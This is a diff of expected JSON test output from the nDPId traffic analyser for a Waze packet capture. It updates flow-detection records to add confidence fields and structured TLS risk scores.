 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1435587867443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1435587867443,"pkt":"ABoRAAACABoRAAABCABFAABMAABAAEARHHkKCAAByFlLxrSGAHsAOIB9GwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANk705txaHKW"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","ndpi": {"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1435587867753,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1435587867753,"pkt":"ABoRAAACABoRAAABCABFAABMdHBAABAR2AjIWUvGCggAAQB7tIYAOEf+HAIA7AAAAUgAAAbvyDaVGNk70ieZS5oL2TvTm3FocpbZO9ObncvLHNk705ud0JHn"}
 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867755,"flow_last_seen":1435587867755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587867755,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1435587867755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587867755,"pkt":"ABoRAAACABoRAAABCABFAAA8zNlAAEAGoisKCAABQSeAh9aDAFDjx6dUAAAAAKAC\/\/+uwgAAAgQFtAQCCAoACGuNAAAAAAEDAwg="}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1435587867759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAodHFAABAGKqhBJ4CHCggAAQBQ1oMcOFir48enVVAS\/\/8NRwAA"}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1435587867759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAozNpAAEAGoj4KCAABQSeAh9aDAFDjx6dVHDhYrFAQ\/\/8NSAAA"}
-00728{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587867755,"flow_last_seen":1435587867781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1435587867781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":0,"content_type":"","user_agent":"Android"}}
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587867755,"flow_last_seen":1435587867781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1435587867781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":0,"content_type":"","user_agent":"Android"}}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1435587868123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"ts_msec":1435587868123,"pkt":"ABoRAAACABoRAAABCABFAABNMsNAAEAGQsQKECWdriXnUaUQFGaA18okWhY9doAYAVcnqgAAAQEICgAIa9FBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="}
 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868632,"flow_last_seen":1435587868632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587868632,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1435587868632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587868632,"pkt":"ABoRAAACABoRAAABCABFAAA814xAAEAGPpQKCAABNubjrLHZAFCatruPAAAAAKAC\/\/+u6AAAAgQFtAQCCAoACGwDAAAAAAEDAwg="}
@@ -24,24 +24,26 @@
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1435587868644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587868644,"pkt":"ABoRAAACABoRAAABCABFAAAo141AAEAGPqcKCAABNubjrLHZAFCatruQZUlEcVAQ\/\/\/ZDQAA"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAojYdAAEAGx1YKCAABLjOtto0EAbvOcuGGMY0ee1AQ\/\/87IQAA"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAoH6pAAEAGNTQKCAABLjOtto0GAbtbbHOupJOMU1AQ\/\/87HwAA"}
-00745{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868632,"flow_last_seen":1435587868906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1435587868906,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868632,"flow_last_seen":1435587868906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1435587868906,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868632,"flow_last_seen":1435587868910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1435587868910,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868996,"flow_last_seen":1435587868996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587868996,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1435587868996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587868996,"pkt":"ABoRAAACABoRAAABCABFAAA8cVdAAEAGm2kKCAABrcJ2MI7pAburox1\/AAAAAKAC\/\/9UDAAAAgQFtAQCCAoACGwoAAAAAAEDAwg="}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1435587868998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587868998,"pkt":"ABoRAAACABoRAAABCABFAAAodHhAABAGyFytwnYwCggAAQG7julUXOKAq6MdgFAS\/\/\/xMQAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1435587869002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587869002,"pkt":"ABoRAAACABoRAAABCABFAAAocVhAAEAGm3wKCAABrcJ2MI7pAburox2AVFzigVAQ\/\/\/xMgAA"}
-00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868634,"flow_last_seen":1435587869002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587869002,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868996,"flow_last_seen":1435587869054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1435587869054,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868635,"flow_last_seen":1435587869106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587869106,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00874{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868996,"flow_last_seen":1435587869107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1435587869107,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"23f1f6e2f0015c166df49fdab4280370","unsafe_cipher":2,"cipher":"TLS_ECDHE_RSA_WITH_RC4_128_SHA"}}
+00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868634,"flow_last_seen":1435587869002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587869002,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868996,"flow_last_seen":1435587869054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1435587869054,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868635,"flow_last_seen":1435587869106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587869106,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868996,"flow_last_seen":1435587869107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1435587869107,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"23f1f6e2f0015c166df49fdab4280370","unsafe_cipher":2,"cipher":"TLS_ECDHE_RSA_WITH_RC4_128_SHA"}}
 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587869162,"flow_last_seen":1435587869162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587869162,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1435587869162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587869162,"pkt":"ABoRAAACABoRAAABCABFAAA8XmhAAEAGt7gKCAABNubjrLHgAFDjpDJQAAAAAKAC\/\/\/u\/QAAAgQFtAQCCAoACGw4AAAAAAEDAwg="}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1435587869163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAodIRAABAG0bA25uOsCggAAQBQseAcW82v46QyUVAS\/\/\/ZBQAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1435587869163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAoXmlAAEAGt8sKCAABNubjrLHgAFDjpDJRHFvNsFAQ\/\/\/ZBgAA"}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587869162,"flow_last_seen":1435587869165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1435587869165,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}}
-00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":66,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868635,"flow_last_seen":1435587869425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"ts_msec":1435587869425,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}}
-01155{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868634,"flow_last_seen":1435587869476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"ts_msec":1435587869476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
-01155{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587868635,"flow_last_seen":1435587869477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"ts_msec":1435587869477,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
